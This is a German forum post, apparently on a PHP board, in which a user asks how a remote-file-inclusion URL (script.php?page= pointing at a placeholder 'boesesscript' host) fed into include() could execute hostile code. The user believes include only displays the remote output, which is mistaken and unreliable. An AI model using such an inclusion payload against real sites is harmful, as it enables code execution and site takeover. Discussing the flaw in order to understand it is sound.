title image


Smiley Zwischenfrage: http://example.net/boesesscript wird doch nicht Ausgeführt
Hi,



ich bin ja nicht der Thread Eröffner, aber was ich in solchen Diskusionen nicht verstehe ist, wie soll durch diesem Aufruf:

http://example.org/script.php?page=http://example.net/boesesscript

und dem späteren:

include("$page1");

"Böser" Code auf seinem Webspace zur Ausführung kommen? Also dass so ungewollt die Seite für Phishing und CrossSiteScripting genutzt werden kann ist klar. Aber ich dachte durch solches include bekomme ich eben an der Stelle nur die Ausgabe von http://example.net/boesesscript in meiner Seite zu sehen.



Gruß

Tops
Dumm:
Dümmer:
Am dümmsten:


geschrieben von

Login

E-Mail:
  

Passwort:
  

Beitrag anfügen

Symbol:
 
 
 
 
 
 
 
 
 
 
 
 
 

Überschrift: